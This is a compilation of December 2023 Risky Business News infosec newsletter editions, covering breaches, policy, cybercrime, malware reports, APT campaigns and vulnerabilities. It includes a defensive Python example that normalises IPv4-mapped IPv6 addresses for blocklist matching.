You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed.

The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.

Happy holidays!


Breaches, hacks, and security incidents

Kyivstar cyberattack: Kyivstar, Ukraine's largest mobile operator, was hit by a powerful cyberattack that disrupted services to most of its customers this week. No ETA has been provided for services coming back online. Suspicions are, obviously, on Russia. [Additional coverage in Reuters/non-paywall/Grugq commentary]

UAE TV defacements: Hackers have hijacked set-top boxes across the UAE to broadcast graphic content from the ongoing Hamas-Israel war. Known affected devices include the HK1 RBOXX. [Additional coverage in Mashable]

Insomniac hack: Sony has confirmed that hackers breached Insomniac Games, the developer of the Spider-Man 2 video game. The attack has been claimed by the Rhysida gang, which claims to have acquired screenshots and character art for the studio's upcoming Wolverine video game. [Additional coverage in Kotaku]

General tech and privacy

TikTok in Taiwan: A French documentary examined how TikTok has been used to influence young voters away from the country's independence and toward closer relations with, and possible annexation by, China. [Additional coverage in TaiwanNews]

VMware licensing update: Broadcom is killing off VMware on-premises perpetual licenses and forcing existing customers to a subscription-based model by ending the sale of support licenses. [Additional coverage in The Stack]

WhatsApp expiring voice messages: WhatsApp has added support for one-time expiring voice messages. The app has had support for a similar feature for text and video messages since 2021.

Meta sues the FTC: Social media company Meta has sued the FTC and challenged the agency's constitutionality because all US corporations believe they have more rights than actual human beings and that an agency that protects consumer rights should not exist. I'm exaggerating. Maybe. [Additional coverage in The Record]

"Strap on your seat belt," said Vladeck, who is now faculty director at Georgetown Law School’s Center on Privacy and Technology. Meta has "made a strong argument that the agency's ability to litigate cases administratively within the confines of the FTC violates the Constitution."

Discord adds security keys: Discord has added support for security keys and passkeys.

Government, politics, and policy

AI Act: EU authorities have agreed on a first version of the AI Act, a law meant to regulate artificial intelligence development and tools across the EU.

UK sanctions Asian scammers: The UK government has sanctioned nine individuals and five entities for their involvement in trafficking people in Cambodia, Laos, and Myanmar and forcing victims to work in call centers specialized in cyber fraud (also known as "pig butchering scams"). These are the first-ever sanctions levied against online scam operations.

FBI SEC reporting rules: The FBI has published a guide on how companies that suffered a security breach should report their incidents to the SEC and other authorities. The guide comes after a ransomware gang tried to use the confusion around these new rules to put pressure on a victim as part of their ransom negotiations.

US SBOM guidance: Multiple US government agencies have released guidance on securing software supply chains. The guidance covers the use of SBOMs, the use of open-source software, and the proper ways of using and maintaining open-source repositories.

Harry Coker confirmation: The US Senate has confirmed Harry Coker as the new White House National Cyber Director. [Additional coverage in Politico]

AFP's call to ransomware victims: The Australian Federal Police has called on victims to report their ransomware attacks "as soon as possible."

Iran-Russia cyber treaty: Iran and Russia have signed a cybersecurity cooperation treaty. [Additional coverage in Iran International]

Ukraine takes credit for FNS hack: Ukraine's Defence Intelligence Main Directorate (GUR) says it hacked Russia's Federal Taxation Service (FNS) and wiped more than 2,300 of the agency's databases. GUR says Russian officials have been trying to restore the systems for the past four days. This is the second time the GUR officially took credit for a hack of a Russian agency after it also hacked Russian civil aviation agency Rosaviatsiya.

Risky Business Podcasts

In this podcast, Patrick Grey and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.

Cybercrime and threat intel

Kelvin Security arrest: Spanish police have arrested the leader of the Kelvin Security hacking group. The group and its members were known for exploiting vulnerabilities and selling access to the hacked systems.

Hive gang member arrested: A Russian national suspected of being a member of the Hive ransomware group was detained in Paris this week. His home in Cyprus was also raided following the arrest. The suspect allegedly helped the gang launder its ransoms. [Additional coverage in LeFigaro/non-paywall]

Platypus case: French prosecutors are appealing a French court's decision to release two suspects accused of hacking the Platypus cryptocurrency exchange. [Additional coverage in ZDNet France]

BOFH sentenced: A US judge sentenced a former cloud engineer to two years in prison for hacking and damaging his former employer's cloud network, a US bank.

KillMilk retires: KillMilk, the leader of the KillNet hacktivist group, has announced his retirement and appointed a new head honcho, an individual known as Deanon Club. KillMilk retired days after a Russian newspaper published his real-world identity as a 30-year-old Russian national named Nikolai Serafimov. [Additional coverage in The Record]

Amazon sues REKK group: Amazon has filed a lawsuit against REKK, a criminal group specializing in refund fraud. [Additional coverage in The Verge]

No AlphV takedown confirmation: There's been no official confirmation that law enforcement seized the server infrastructure of the AlphV ransomware gang. In the meantime, some AlphV servers started coming back online, but without their content. AlphV admins claim they just lost the hard drives.

TA4557/FIN6: Proofpoint says that since October, a threat actor known as TA4557 (with links to FIN6) has been targeting job recruiters while posing as prospective candidates.

UTG-Q-003: Chinese security firm QiAnXin has published a report on UTG-Q-003, a threat actor the company says uploaded a malicious app to the official Microsoft Windows Store that tried to pass as a Russian-language version of the 7-Zip file-archiving app. The final payload was the Lumma infostealer. The app had been live in the store since mid-March, and downloads spiked in August.

Scattered Spider: SilentPush researchers have published new TTPs used by Scattered Spider, the group behind recent hacks at Okta, Twilio, and MGM.

FTC QR code alert: The FTC has published a consumer threat alert, warning Americans that scammers are now using QR codes as part of their operations, redirecting users to malicious sites.

Europol security advisory: Europol says criminal gangs are increasingly using Bluetooth tracking devices to geolocate either victims or illegal goods.

Scam centers expand to LATAM: Interpol says that the trend of cyber fraud scam centers using kidnapped and human-trafficked operators is expanding from Southeast Asia to Latin America.

IP cloaking technique: SANS ISC is seeing threat actors map IPv4 addresses to IPv6 as a way to cloak their attacks and evade detection.
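The defender's side of this, as an added example that is not code from the SANS ISC post: a blocklist or detection rule that compares raw address strings misses an IPv4 address once it shows up in dual-stack logs in its IPv4-mapped IPv6 form (dotted or hex), so addresses should be canonicalised before matching. The blocklist entries and access-log lines below are constructed from documentation ranges.

```python
"""Canonicalise IPv4-mapped IPv6 addresses before blocklist matching.

Added example, not code from the SANS ISC post. On a dual-stack host the
client 203.0.113.9 can be logged as ::ffff:203.0.113.9 or, in hex form,
::ffff:cb00:7109. A rule that compares raw strings against an IPv4 list
misses both; collapsing the mapped form first closes that gap.
All addresses, blocklist entries and log lines here are constructed.
"""
import ipaddress
from typing import List, Optional, Tuple


def canonical_ip(raw: str) -> Optional[str]:
    """Return the address in a canonical text form suitable for matching.

    IPv4-mapped IPv6 addresses (the ::ffff:0:0/96 range) are collapsed to
    the embedded IPv4 address; any other address gets its compressed
    canonical form. Returns None for anything that is not a valid address.
    """
    try:
        addr = ipaddress.ip_address(raw.strip())
    except ValueError:
        return None
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return str(addr.ipv4_mapped)
    return str(addr)


def build_blocklist(entries: List[str]) -> list:
    """Parse blocklist entries (single hosts or CIDR ranges) into networks."""
    return [ipaddress.ip_network(entry, strict=False) for entry in entries]


# Plain string blocklist, kept only to show what a naive rule misses.
NAIVE_LIST = {"203.0.113.9", "198.51.100.7"}


def naive_is_blocked(raw: str) -> bool:
    """Raw string comparison: matches only the exact spelling that was listed."""
    return raw.strip() in NAIVE_LIST


def is_blocked(raw: str, blocklist: list) -> bool:
    """True if the canonicalised address falls inside a blocklisted network."""
    canon = canonical_ip(raw)
    if canon is None:
        return False
    addr = ipaddress.ip_address(canon)
    return any(addr.version == net.version and addr in net for net in blocklist)


def scan_log(lines: List[str], blocklist: list) -> List[Tuple[str, str]]:
    """Return (address as logged, canonical address) for each blocklisted client.

    Assumes the common access-log layout in which the client address is the
    first whitespace-separated field of the line.
    """
    hits = []
    for line in lines:
        if not line.strip():
            continue
        client = line.split(None, 1)[0]
        canon = canonical_ip(client)
        if canon is not None and is_blocked(canon, blocklist):
            hits.append((client, canon))
    return hits


# Constructed data using documentation ranges only (RFC 5737 / RFC 3849).
BLOCKLIST = build_blocklist(["203.0.113.0/24", "198.51.100.7"])

SAMPLE_LOG = [
    '203.0.113.9 - - [12/Dec/2023:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 612',
    '::ffff:203.0.113.9 - - [12/Dec/2023:10:00:02 +0000] "GET /xmlrpc.php HTTP/1.1" 200 370',
    '::ffff:cb00:7109 - - [12/Dec/2023:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 612',
    '2001:db8::1 - - [12/Dec/2023:10:00:04 +0000] "GET / HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Dec/2023:10:00:05 +0000] "GET /admin HTTP/1.1" 403 199',
    '192.0.2.1 - - [12/Dec/2023:10:00:06 +0000] "GET / HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for logged, canon in scan_log(SAMPLE_LOG, BLOCKLIST):
        verdict = "hit" if naive_is_blocked(logged) else "MISSED by raw string match"
        print(f"{logged:<22} -> {canon:<14} naive rule: {verdict}")
```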

Log4j stats: Two years after security researchers discovered the Log4Shell vulnerability, roughly 38% of applications still use a vulnerable version of the Apache Log4j library.

PyPI malware: ESET has discovered 116 malicious packages uploaded to PyPI. Most of the libraries contained a version of the W4SP Stealer.

npm malware: Phylum has discovered a cluster of npm packages containing encrypted code that (when decrypted) tried to exfiltrate local user credentials to a Microsoft Teams account. The packages targeted a "major financial institution."

NCC yearly report: NCC Group has published its year-in-review research report.

Cloudflare yearly report: Cloudflare has published its year-in-review report. The most interesting tidbit is that 1.7% of TLS 1.3 traffic is now using post-quantum encryption.

OAuth app attacks: Microsoft has put out a report reviewing recent attacks that have used OAuth apps for escalating intrusions.

Malware technical reports

Kinsing: Sekoia has observed the Kinsing crypto-mining botnet exploit a recent Apache ActiveMQ zero-day tracked as CVE-2023-46604.

ATMZOW: GoDaddy's Sucuri has seen new domains deployed by the ATMZOW card skimming gang.

Rhysida ransomware: ShadowStackRE has published an analysis of Rhysida, the ransomware gang behind the recent breach at Insomniac Games, the maker of the Spider-Man games.

AsyncRAT: Trend Micro has published a report looking at AsyncRAT's new code injection technique.

"The strategic use of multiple obfuscated scripts that incorporate "living off the land" techniques grant malicious actors flexibility, enabling them to evade detection. Coupled with code injection into legitimate files like aspnet_compiler.exe, this technique significantly increases the challenge of detecting these threats."

DarkGate: Zscaler researchers look at the DarkGate malware, which saw a spike in September and October this year. Similar reports are also available from PulseDive, Sekoia, and Trellix.

GuLoader: Elastic's security team has looked at recent versions of GuLoader, an old MaaS.

MrAnon Stealer: Fortinet looks at MrAnon Stealer, a new stealer advertised via Telegram.

Sponsor Section

In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.

APTs, cyber-espionage, and info-ops

Chinese hacking in the US: A Washington Post article [non-paywall] claims that Chinese military hackers have ramped up efforts to breach and backdoor critical infrastructure in the US. Sources claim the goal is to prepare ways to disrupt US operations in the case of a war in Taiwan and the Pacific. Victims include a water utility in Hawaii, a West Coast port, and at least one oil and gas pipeline operator.

PlugX: Cisco's Splunk has published a report on PlugX, a malware strain used by almost all Chinese APTs (and their dogs).

Sandman APT: In a joint report between SentinelOne, PwC, and Microsoft, the three companies link the Sandman APT, which SentinelOne discovered back in September, to a cluster of suspected Chinese activity.

Mustang Panda: Lab52 looks at a recent Mustang Panda campaign employing the PlugX malware.

Lazarus adopts D: According to a Cisco Talos report, North Korean group Lazarus has been using a piece of novel malware written in the D programming language.

Kimsuky: AhnLab has published a report on new Kimsuky campaigns delivering the Amadey and RftRAT malware.

ITG05/APT28: IBM X-Force looks at an ITG05/APT28 operation leveraging the Israel-Hamas war to deliver its custom-made Headlace backdoor.

Indian info-op: A Washington Post investigation [non-paywall] has exposed that a social media research organization named Disinfo Lab (not to be confused with the real EU Disinfo Lab) is secretly an Indian intelligence operation meant to discredit Narendra Modi's critics. The organization has been active since 2020 and mixing facts with claims that Indian government critics are part of a conspiracy led by global Islamic groups and billionaire George Soros to undermine India.

Vulnerabilities, security research, and bug bounty

Patch Tuesday: Yesterday was the December 2023 Patch Tuesday. We had security updates from Adobe, Apple, Microsoft, Chrome, SAP, Fortinet, Sophos, Zoom, Schneider Electric, and Siemens. The Android Project, Cisco, Atlassian, VMWare, Zyxel, QNAP, Apache CouchDB, Apache Struts, WordPress, Joomla, and Drupal released security updates last week as well. The Apple updates fix two zero-days, while the Sophos update includes new patches for a zero-day initially patched back in September 2022. It was a quiet Patch Tuesday from Microsoft this month, with only 41 bug fixes.

Struts RCE: Of all these PT bugs, one of the worst is the new Struts RCE. See these two breakdowns for more information.

pfSense vulnerabilities: SonarSource has discovered three vulnerabilities (two XSS, one command injection) in pfSense, an open-source firewall solution.

Silverpeas vulnerabilities: Rhino Security has discovered eight vulnerabilities in Silverpeas Core, an open-source business and team collaboration project.

CS2 bug: A bug is being exploited in the wild to deface Counter-Strike 2 games and obtain users' IP addresses.

WP shortcode vulnerability: Wordfence has found more than 100 WordPress plugins on the official WP repository that are vulnerable to XSS attacks via their shortcode functionality. More than 6 million WordPress sites are believed to be affected.

Timing side-channel attack: Mozilla has patched a timing side-channel attack in the Firefox NSS codebase. Details about the attack will be published in January.

5Ghoul attack: A team of academics has discovered 14 vulnerabilities in 5G modems from Qualcomm and MediaTek. Referred to as 5Ghoul, the vulnerabilities impact more than 710 modern smartphone models.

Infosec industry

New tool—Swagger Jacker: Security firm Bishop Fox has open-sourced a new tool named Swagger Jacker for auditing OpenAPI definition files.

"This enables offensive security professionals to identify potential vulnerabilities or misconfigurations in the API routes defined within the definition document."

New tool—ScubaGoggles: CISA has open-sourced a new tool named ScubaGoggles, a baseline assessment tool for Google Workspace environments.

PHDays recap: Margin Research has published a recap of PHDays 2023, Russia's largest cybersecurity conference, and how the cybersecurity market has changed two years into Russia's invasion of Ukraine.

Trend Micro move: Trend Micro has closed down its Chinese R&D division and plans to open a new center in Canada. [Additional coverage in Radio Free Asia]

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.

Risky Biz News: UK summons Russian ambassador over hacking campaigns, doxes FSB unit behind APT group

8 December 2023 at 00:30


The Risky Biz News newsletter and podcast will be going on hiatus between December 8 and January 8 for our yearly winter holiday.

The UK government has summoned Russia's ambassador to explain a years-long hacking campaign conducted by one of the FSB's cyber units.

Officials say that FSB hackers targeted politicians and government organizations and attempted to use hacked data to influence and interfere in UK politics.

The UK government statement connects—for the first time—an APT group known as Star Blizzard to Center 18, a cybersecurity division inside Russia's FSB intelligence agency.

Also known in infosec nomenclature as Callisto, ColdRiver, Seaborgium, TA446, TAG-53, Gossamer Bear, Iron Frontier, and BlueCharlie, the group has been active since at least 2015.

Officials say Star Blizzard hacked Parliament members from multiple UK political parties, a UK think tank that studies disinformation, and journalists, NGOs, universities, and members of the UK civil society that have played crucial roles in maintaining the UK's democracy.

In addition, the UK says the same hackers also stole secret US-UK trade documents and then attempted to use passages from those documents to sway the UK 2019 General Election in a campaign known as Secondary Infektion.

In a joint technical report [PDF] published with its Five Eyes partners, the UK's cybersecurity agency (NCSC) says the group has recently pivoted to target organizations in other NATO countries and Russia's neighbors.

An additional Microsoft report dives into newer TTPs that the group has been using since 2022.

UK and US authorities also imposed sanctions on two members of the Star Blizzard group, one of whom is an FSB officer. The US has also charged the two for attacks on its government systems and is offering a $10 million reward for information leading to their arrest.

  • Ruslan Aleksandrovich PERETYATKO, who is a Russian FSB intelligence officer and a member of Star Blizzard, aka the Callisto Group 

  • Andrey Stanislavovich KORINETS, aka Alexey DOGUZHIEV, who is a member of Star Blizzard, aka the Callisto Group 

This marks the UK government's second action this year against FSB hacking operations. In May, together with its Five Eyes partners, the UK exposed and took down the Snake malware botnet, operated by the FSB's Center 16.

It also marks the second time the US has charged members of the FSB Center 18. In 2017, the US charged another FSB Center 18 officer for his role in hacking Yahoo in 2014.


Breaches, hacks, and security incidents

Nissan breach: Japanese carmaker Nissan has confirmed that hackers breached the financial unit of its Oceania division. The company says it is working to restore affected systems and investigating whether user data was accessed. The Nissan Oceania outage is currently impacting other car vendors in Australia that were using the company's financing and loan services, such as Renault, Mitsubishi, Infiniti, and Ram Trucks.

Austal ransomware incident: Australian shipbuilder and defense contractor Austal has fallen victim to a ransomware attack. [Additional coverage in Maritime Executive]

23AndMe breach data: DNA and genetic testing service 23andMe has rolled out an update to its Terms of Service that blocks users from suing the company and forces them into a binding arbitration agreement. The company took this step days after it revised the size of a data breach that took place in October. 23AndMe initially said that hackers stole data on only 1% of the company's users. The company later changed the tally to 6.9 million users, representing almost half of the company's 14 million user base. [Additional coverage in StackDiary]

General tech and privacy

Push notification surveillance: Law enforcement agencies from the US and abroad have found a new way to track and identify users by requesting mobile push notification metadata from Apple and Google. The technique can reveal a huge amount of information because all mobile push notifications are relayed through Apple and Google servers. According to the Washington Post, the new investigative technique has been used in the US to collect information on January 6 Capitol rioters. According to Reuters, the technique has also been used in democracies allied to the United States.

VPN users explode in Russia: The number of VPN users in Russia exploded by 37% this year after authorities increased their internet censorship crackdown. The number of Russian VPN users is estimated to be 11 million users, according to a study of anonymized Internet traffic. The number is 2.5 times higher than in 2021, before Russia's invasion of Ukraine. [Additional coverage in Forbes Russia]

US govt close to dropping Firefox: Because Firefox blocks Google Analytics code, someone at the US government tech department is about to drop support for the Firefox browser from US government websites because they think the browser is not being used by site visitors. 

Former security exec sues Twitter: Twitter's former head of information security has sued the company in a New Jersey court for wrongful termination. Alan Rosa claims he was fired after objecting to budget cuts in the aftermath of Elon Musk's takeover. The former exec says he was also asked to shut down software that allowed Twitter to share data with law enforcement. [Additional coverage in Reuters/non-paywall]

Meta rolls out E2EE on Messenger: Meta has started enabling end-to-end encryption (E2EE) conversations for all Facebook Messenger users. The company says the roll-out phase will take a few months to complete, but it will cover all of its one billion Messenger users. Facebook Messenger has supported encrypted conversations since 2016 under a feature named Secret Conversations, but the feature was only optional. Meta says it's been working on default E2EE support since 2019, which now runs on top of its new Labyrinth encrypted storage protocol.

Apple calls for E2EE encryption: Apple Head of Security Engineering and Architecture (SEAR) Ivan Krstić is calling on tech companies to support E2EE encryption as a main defense against data breaches.

YouTube tracking identifier: Something we missed a few months back is that YouTube share links now have a new "SI" tracking identifier appended at the end that you may want to delete when sharing YouTube video links with friends.

Windows 12 release date: According to a report from Taiwanese media citing local laptop and hardware manufacturers Acer and Quanta, Windows 12 is expected to be released in June 2024.

Chrome 120: Google has released version 120 of its Chrome browser. See here for security patches and webdev-related changes. The biggest changes include the first stage of deprecating third-party cookies, a password-sharing feature, a revamped look for the new tab page, a new Safety Check feature, a feature to auto-organize tabs, and deprecating support for Android 7. In the EU, Chrome is now also prompting users to choose their default search engine.

Government, politics, and policy

DOD contractor recommendations: The DOD IG has published a document with 24 recommendations for addressing cybersecurity vulnerabilities among DoD contractors.

CISA SbD alert: CISA has published its second Secure by Design alert, with this one urging software developers to transition to memory-safe programming languages.

CyberCommand has to wait for new lead: Republican Sen. Tommy Tuberville has partially ended his hold on US military promotions, but the NSA and CyberCommand still have to wait for a new lead. The US Senate has approved 425 promotions, but Tuberville is still blocking nominations for four-star general positions and higher. [Additional coverage in CBS]

EU-US cooperation: ENISA and CISA have signed a new cooperation treaty.

Canada's election cyber guidance: Canada's cybersecurity agency has published a series of cybersecurity guides related to its upcoming election cycle. The guides target voters, campaigns, and government officials. The agency warns of online influence operations.

Risky Business Podcasts

In this podcast, Patrick Gray and Tom Uren talk about how threat actors abusing legitimate tools (aka living off the land or LOLbins) is the new normal. Everyone is doing it, from activists to cybercriminals to nation-states. It's a worry because the defender's standard practices really aren't set up to detect and deal with that kind of behavior.

Cybercrime and threat intel

Bitzlato CEO pleads guilty: The CEO of the Bitzlato cryptocurrency exchange has pleaded guilty to money laundering-related charges. Russian national Anatoly Legkodymov was arrested earlier this year together with four of the company's executives. European and US authorities say Bitzlato helped criminal cartels and ransomware gangs launder more than $700 million worth of crypto. Officials say almost half of Bitzlato transactions were linked to criminal activity after the site's leadership failed to implement anti-money laundering controls.

CyberAv3ngers attacks: SecurityScorecard has identified six IP addresses used by Iranian group CyberAv3ngers to scan the internet for unsecured Unitronics PLCs.

New ITAU kit: The IT Army of Ukraine has published a new DDoS toolkit for its members.

DDoS booters: Searchlight Cyber looks at four of the most popular DDoS booters on the market—Nightmare Stresser, Stressthem, Paper Stresser, and Krypton Networks.

Rappler DDoS attacks: An investigation by the Qurium Media Foundation has found that the infrastructure of two proxy providers named FineProxy and RayoByte has been used in a massive DDoS attack targeting Rappler, Indonesia's leading independent news agency. The two proxy providers are operated out of Russia and the US, respectively. Qurium says that when they contacted the two companies, they offered to block outgoing DDoS traffic to Rappler rather than suspend their abusive customers. Researchers are now urging law enforcement authorities to look into the two providers.

"As a way to 'mitigate the problem' both Rayobyte and Fineproxy have asked Qurium to provide a list of our hosted organizations so they can ensure that they will not become victims of DDoS again in the future. Clever, isn't it? If Qurium's clients are no longer victims, there will be no more forensics reports revealing their malicious practices!"

"FineProxy even went one step further to silence Qurium. In an email exchange with Ilya Trusov CEO of FineProxy in late October 2023, we were offered to reveal the name of the customer that was responsible for the DDOS attacks. The condition to receive the customer’s information was to remove all articles about their proxy service from Qurium’s website."

"The investigation further reveals the actors behind the Russian proxy provider 'Fineproxy' and how they have managed to obtain hundreds of thousands of IP addresses from regional registrars like RIPE and ARIN and faked geo-location data to make their proxy service more valuable."

DoS classification scheme: ENISA has published a report on the DoS threat landscape, including a DoS classification scheme.

Year in Review: Cisco Talos has published its year-in-review report for 2023. As the company puts it in the introduction, "ransomware, commodity loaders and APTs dominated the threat landscape in 2023." The report has three Microsoft bugs as the top exploited CVEs of the year, per Cisco telemetry.

Malware technical reports

Krasue: Security firm Group-IB has discovered a new Linux malware strain that has been secretly infecting systems since at least 2021. Named Krasue, the malware is primarily used to serve as initial access for other cybercrime operations. Group-IB says the botnet appears to have been created by the author of the infamous XorDDoS malware or at least by someone who had access to its original source code. In addition, Krasue stands out for its use of the RTSP protocol for command-and-control channels and the use of three open-source projects (Diamorphine, Suterusu, and Rooty) to create a powerful Linux rootkit. Most Krasue infections seen so far have been spotted in Thailand.

Csharp-streamer RAT: G DATA's Michael Zimmer looks at the new Csharp-streamer RAT.

Qilin ransomware: ShadowStackRE researchers have published an analysis of the ESXi encrypter used by the Qilin ransomware gang.

Sponsor Section

In this product demo, Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray.

APTs, cyber-espionage, and info-ops

Lazarus Telegram campaign: North Korean hacking group Lazarus is conducting a large-scale Telegram phishing operation targeting members of the cryptocurrency industry. The campaign started in early 2022 and is still ongoing, according to blockchain security firm SlowMist. Lazarus operators pose as cryptocurrency investors and typically target DeFi projects. The goal of most campaigns is to lure victims to phishing sites, collect their credentials, and then hack their projects.

UAC-0050: CERT-Ukraine has published an advisory warning of phishing campaigns conducted by Russian group UAC-0050 targeting Ukraine and Poland with the Remcos RAT and the MeduzaStealer.

APT28: PAN's Unit42 looks at APT28 campaigns targeting an Outlook vulnerability tracked as CVE-2023-23397. PAN says they've seen the group target 30 organizations across 14 countries over the past 20 months using this vulnerability.

Russian info-op uses celebrities: A Russian threat actor named Doppelgänger has used fake quotes attributed to various celebrities to push anti-Ukraine propaganda. The campaign took place in November and attributed quotes to celebrities like Taylor Swift, Kim Kardashian, Beyonce, Shakira, Justin Bieber, Cristiano Ronaldo, and others. The group also used AI-generated content in a separate campaign, but that one received less user engagement. The Doppelgänger group has been previously linked to a unit inside Russia's GRU military intelligence service. [Additional coverage in Wired/non-paywall/Microsoft report]

Teal Kurma's SnappyTCP: PwC's security team has published a report going over SnappyTCP, a Linux reverse shell used in attacks by the Teal Kurma (Sea Turtle) APT. Previous reporting linked the group to Türkiye.

Vulnerabilities, security research, and bug bounty

Mozilla VPN security audit: Mozilla has published its most recent security audit of its VPN product.

WordPress RCE: The WordPress team has released a security update to patch a rare remote code execution vulnerability in its CMS. Even though WordPress accounts for 43% of all internet websites, the vulnerability does not have a broad impact. It affects only two very recent WordPress versions and is not exploitable in default configurations. Websites have to either use certain plugins or be in multisite mode.

Sierra:21 vulnerabilities: Forescout researchers have found 21 vulnerabilities in popular solutions used inside industrial and critical networks. The bugs impact Sierra Wireless Airlink cellular routers and TinyXML and OpenNDS, two open-source components.

Chromecast jailbreak: DirectDefense researchers have developed a three-exploit jailbreak for Chromecast devices. The jailbreak is a secure boot bypass that lets users run their own code on the device.

Syrus4 vulnerability: A team of security researchers says Digital Communications Technologies has not addressed a bug impacting its Syrus4 IoT gateway, leaving vehicle fleets open to attacks that could shut them down. The vendor has been apparently ghosting the researchers. [Additional coverage in CyberScoop]

Zyxel NAS vulnerabilities: BugProve has published details on two vulnerabilities in Zyxel NAS devices.

SonicWall vulnerability: Praetorian researchers have identified an authentication bypass and RCE in SonicWall WXA appliances. Praetorian says the vulnerabilities have a low impact in terms of real-world risk.

Atlassian security updates: Atlassian has released four security updates to patch RCE vulnerabilities across several products. They're all pretty bad, so patch ASAP.

Bluetooth vulnerability: Skysafe security researcher Marc Newlin has found a critical Bluetooth vulnerability (CVE-2023-45866) that can allow threat actors to bypass authentication, hijack Bluetooth connections, and perform keystroke injections. Newlin says attackers can instruct operating systems to install malicious apps or run malicious commands. The attack impacts Android, Linux, iOS, and macOS—and works even if Lockdown Mode is enabled on Apple devices. Only the Android team has patched the vulnerability so far. [Update on Jan 14, 2024: This has now been fixed on Apple devices.]

AutoSpill attack: Three academics from an Indian university have discovered a vulnerability in the Android autofill feature that can be used to spill secrets from password managers. Named AutoSpill, the attack is identical to similar techniques previously seen on desktops, exploiting browser auto-fill operations. Researchers say they successfully tested AutoSpill on password managers from 1Password, LastPass, Keeper, and Enpass. Researchers are also working on replicating the attack on iOS devices. [Additional coverage in TechCrunch]

Pool Party technique: SafeBreach researchers have identified eight new process injection techniques they are collectively referring to as Pool Party that can be used to bypass EDR solutions.

Infosec industry

Reuters takes down Appin article: Reuters has taken down an article about an Indian company that has provided hacking-for-hire services for more than a decade. The news agency says it took down the article to comply with a preliminary court order issued in India after Appin sued Reuters last month. Reuters says it stands by its reporting and plans to appeal the court order.

New Microsoft CISO: Microsoft has appointed Igor Tsyganskiy as its new Chief Information Security Officer, Microsoft Executive Vice President for Security Charlie Bell announced on LinkedIn. Tsyganskiy replaces Bret Arsenault, who previously served as Microsoft CISO for 14 years. Arsenault will move to a new role of Chief Security Advisor. Microsoft's executive shuffle comes months after Chinese state hackers compromised the company's internal network. [Additional coverage in SecurityWeek]

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.

Risky Biz News: US government agencies lag on logging compliance

6 December 2023 at 00:30


An audit of 23 of the largest US federal agencies found that most have failed to implement proper event logging and may be unprepared to respond to cybersecurity incidents, especially during the investigation and remediation phase.

Conducted by the US Government Accountability Office (GAO), the audit found that 20 of the 23 agencies did not meet a White House executive order mandating that they reach logging level EL3 by August 2023.

GAO says that only three agencies reached the proper requirement, while 17 were still at EL0 and had not made any headway toward compliance.

A table showing US government logging levels, from EL0 to EL3

The White House signed Executive Order 14028 [PDF] in May 2021 in the aftermath of Russia's attacks on SolarWinds servers and China's zero-day exploitation of Microsoft Exchange servers.

Investigations into both hacks and their impact on US government systems were seriously hindered by the lack of proper event logs, which made figuring out the original attacks a game of putting a puzzle together with pieces from multiple sources.

EO14028 mandated that US federal agencies improve their cybersecurity posture by deploying EDR (endpoint detection and response) tools across their networks, removing barriers from sharing threat intel, scanning for vulnerabilities, and improving investigation and remediation capabilities by supporting proper logging of network events.

GAO says that while the 23 agencies made serious headway toward deploying EDRs and vulnerability scanning frameworks, they have completely missed the mark on improving their logging capabilities.

The 23 agencies cited a lack of staff and technical challenges that come with proper logging. Below, we're quoting the GAO report on some of the reported technical challenges (emboldened text added by us).

"Specifically, 12 agencies stated that gaps in technology or complexities with existing technical environments (e.g., legacy systems) proved challenging in meeting the requirements.

In addition, 17 agencies cited the need for increased storage capacity to meet event logging requirements. For example, to meet event logging levels, some agencies may need to increase storage capacity for logs. This may be due to a need to capture more granular level details or to capture data on events that were not previously required or captured. One agency official stated that his agency currently collects over 7 terabytes of log data per day with a retention of 1 year. The official stated that in order to be compliant with current logging data requirements, the agency would need to expand logging to 70 terabytes per day. Another agency official stated that his agency already collects over 13 billion logs daily, accounting for almost 15 terabytes of data per day."

In addition, the GAO report covers the woes some federal agencies have gone through when it came to improved intelligence sharing.

Agencies reported that many feeds either contained old information, overlapped with each other, or included classified information that they couldn't use in some of their unclassified networks.

The GAO report concludes that while federal agencies are now in a better position to spot attacks, the lack of proper logging is still limiting their incident response and investigation capabilities—which, not coincidentally, was also the reason why some US government agencies didn't spot when they got hacked by Chinese hackers earlier this year during the "Storm-0558" hacks. Those compromises, which abused Microsoft infrastructure, eventually led Microsoft to provide more free logs to their cloud customers, showing the importance of logs in modern-day hyper-connected networks.

The 23 US federal agencies audited by GAO are listed below.

Table showing the 23 US federal agencies audited by GAO

Breaches, hacks, and security incidents

Andariel hacks: The South Korean government says that North Korean hacking group Andariel has breached and stolen sensitive information from some of its defense firms. Officials believe the hackers successfully stole information on the country's laser-based air defense weapons. South Korean police say the intrusions were part of a larger campaign that also hit local universities, research centers, and financial institutions. The group successfully compromised 14 organizations and also engaged in ransomware attacks. Officials say they seized and recovered $360,000 Andariel operators collected through ransoms. [Additional coverage in Yonhap News and Boa News/English coverage in Korea Times]

UK denies nuclear site hack: The UK government has denied a report that Chinese and Russian hackers breached the Sellafield nuclear site. Government officials say they rebutted the rumors before publication, but the Guardian published its report regardless.

PALIG joins MOVEit list: Pan-American Life Insurance Group (PALIG) has joined the list of companies impacted by the MOVEit attacks. More than 2,600 companies across the world have been impacted by the MOVEit hacks, and the data of 77 million users was stolen in the intrusions.

RailYatri hack: The data of more than 23 million users of the RailYatri travel agency has been leaked online and indexed by HIBP. The Indian state-owned company was hacked in December 2022.

